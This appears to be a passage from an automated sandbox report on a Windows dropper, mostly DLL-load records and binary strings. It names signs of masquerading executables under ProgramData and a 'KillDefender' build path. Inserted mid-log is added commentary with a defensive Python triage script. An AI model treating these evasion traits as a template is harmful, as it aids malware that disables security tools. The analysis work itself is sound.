Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: apphelp.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: version.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: vcruntime140.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: cryptsp.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: rsaenh.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: cryptbase.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: libopenblas.vtyum5mxkvfe4pzzer3l7pno6yb4xff3.gfortran-win32.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: libcrypto-1_1.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: wsock32.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mfplat.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mf.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mfreadwrite.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: dxgi.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: d3d11.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mfcore.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: powrprof.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: ksuser.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: kernel.appcore.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mfperfhelper.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: rtworkq.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: umpdc.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: pdh.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: iphlpapi.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: wtsapi32.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: mswsock.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: dnsapi.dll
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeSection loaded: rasadhlp.dll
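The module-load records above are the raw evidence behind several of the report's signature hits: netsh.exe pulling in the firewall configuration helpers, executables dropped under C:\ProgramData loading the CLR shim mscoree.dll, a process named iexplore.exe loading OpenSSL and OpenBLAS libraries that belong to a bundled Python runtime, and WmiPrvSE.exe loading the Defender client library while the MpPreference cmdlet runs. The following Python triage helper is an added example, not part of the Joe Sandbox report: it parses records in this "Source: ... Section loaded: ..." shape (both the cleaned form and the fused "exeSection loaded: ...Jump to behavior" form the extractor produced) and tags each process with the indicators its loads imply. The sample records are constructed from entries in this section; the indicator sets and the libssl-/python3 name prefixes are assumptions about typical payload layouts, not something the report states.

```python
"""Triage helper for Joe Sandbox "Section loaded" records (added example, not part of the report)."""
import re
from collections import defaultdict

# One record per line: "Source: <process path> Section loaded: <module>".
# The extracted report fuses the two fields ("...exeSection loaded: ...")
# and appends "Jump to behavior"; the non-greedy groups tolerate both forms.
RECORD_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*Section loaded:\s*(?P<mod>\S+?\.dll)",
    re.IGNORECASE,
)

# Constructed sample records, copied in shape from entries in this section.
SAMPLE_RECORDS = """\
Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Section loaded: amsi.dll
Source: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\\Windows\\System32\\schtasks.exe Section loaded: taskschd.dll
Source: C:\\Windows\\System32\\netsh.exe Section loaded: firewallapi.dll
Source: C:\\Windows\\System32\\netsh.exe Section loaded: authfwcfg.dll
Source: C:\\ProgramData\\Microsoft\\MicrosoftEdgeUpdate.exe Section loaded: mscoree.dll
Source: C:\\ProgramData\\Microsoft\\Bound.exe Section loaded: mscoree.dll
Source: C:\\ProgramData\\Microsoft\\Internet Explorer\\iexplore.exe Section loaded: libcrypto-1_1.dll
Source: C:\\ProgramData\\Microsoft\\Internet Explorer\\iexplore.exe Section loaded: libopenblas.vtyum5mxkvfe4pzzer3l7pno6yb4xff3.gfortran-win32.dll
"""

# Modules whose presence carries meaning on its own; all of these appear in the report.
CLR_LOADER = {"mscoree.dll"}                       # .NET runtime shim: the image is managed code
FIREWALL_HELPERS = {"firewallapi.dll", "authfwcfg.dll", "fwpolicyiomgr.dll", "fwcfg.dll"}
TASK_SCHEDULER = {"taskschd.dll"}
DEFENDER_CLIENT = {"mpclient.dll"}                 # Windows Defender client library
# Assumption: DLL name prefixes typical of a PyInstaller-bundled Python payload.
# libcrypto- and libopenblas are on the page; libssl- and python3 are not.
BUNDLED_RUNTIME_PREFIXES = ("libcrypto-", "libssl-", "libopenblas", "python3")


def parse_records(text):
    """Return (process_path, module_name_lowercase) pairs for every parsable line."""
    pairs = []
    for line in text.splitlines():
        m = RECORD_RE.search(line)
        if m:
            pairs.append((m.group("proc"), m.group("mod").lower()))
    return pairs


def triage(text):
    """Map each process path to the list of indicator tags its module loads imply."""
    loaded = defaultdict(set)
    for proc, mod in parse_records(text):
        loaded[proc].add(mod)

    findings = {}
    for proc, mods in loaded.items():
        low = proc.lower()
        tags = []
        if low.startswith("c:\\programdata\\"):
            tags.append("executable running from C:\\ProgramData")
        if mods & CLR_LOADER:
            tags.append(".NET (CLR) image")
        if any(m.startswith(BUNDLED_RUNTIME_PREFIXES) for m in mods):
            tags.append("bundled OpenSSL/OpenBLAS runtime DLLs (PyInstaller-style payload)")
        if low.endswith("\\netsh.exe") and mods & FIREWALL_HELPERS:
            tags.append("netsh loaded firewall configuration helpers")
        if low.endswith("\\schtasks.exe") and mods & TASK_SCHEDULER:
            tags.append("Task Scheduler API used")
        if low.endswith("\\wmiprvse.exe") and mods & DEFENDER_CLIENT:
            tags.append("WMI provider host loaded the Defender client library")
        # amsi.dll is normally present in powershell.exe; its absence is the anomaly.
        if low.endswith("\\powershell.exe") and "amsi.dll" not in mods:
            tags.append("powershell.exe without amsi.dll (AMSI may be unloaded or bypassed)")
        if tags:
            findings[proc] = tags
    return findings


if __name__ == "__main__":
    for proc, tags in triage(SAMPLE_RECORDS).items():
        print(proc)
        for tag in tags:
            print("   -", tag)
```

Because the report does not carry process IDs in these records, the helper keys on the image path, so the four netsh.exe instances collapse into one entry; the per-instance view belongs in the behaviour graph, not here. The AMSI check is deliberately inverted: every powershell.exe in this report did load amsi.dll, so it produces no tag, which is the expected result on an unmodified host.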
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Static file information: File size 42137088 > 1048576
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Static PE information: Raw size of =0aP is bigger than: 0x100000 < 0x2825e00
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: API-MS-Win-Core-Util-L1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb source: api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_hashlib.pdb source: _hashlib.pyd.15.dr
Source: Binary string: MlcrosoftEdgeUpdate.pdb source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\Windows\MlcrosoftEdgeUpdate.pdbpdbate.pdbw source: MicrosoftEdgeUpdate.exe, 0000000E.00000002.2210782859.000001B9FFDEC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: API-MS-Win-Core-Handle-L1-1-0.pdb3 source: api-ms-win-core-handle-l1-1-0.dll.15.dr
Source: Binary string: C:\A\18\s\PCbuild\win32\_socket.pdb source: _socket.pyd.15.dr
Source: Binary string: System.ni.pdbRSDS source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: C:\codes\bound\KillDefender\obj\Debug\MlcrosoftEdgeUpdate.pdb source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D86E000.00000004.00000800.00020000.00000000.sdmp, Bound.exe, 00000012.00000000.1960600687.00000212527C2000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-NamedPipe-L1-1-0.pdb3 source: api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
Source: Binary string: API-MS-Win-Core-ProcessEnvironment-L1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF1FE.tmp.dmp.22.dr
Source: Binary string: API-MS-Win-Core-DateTime-L1-1-0.pdb3 source: api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.15.dr
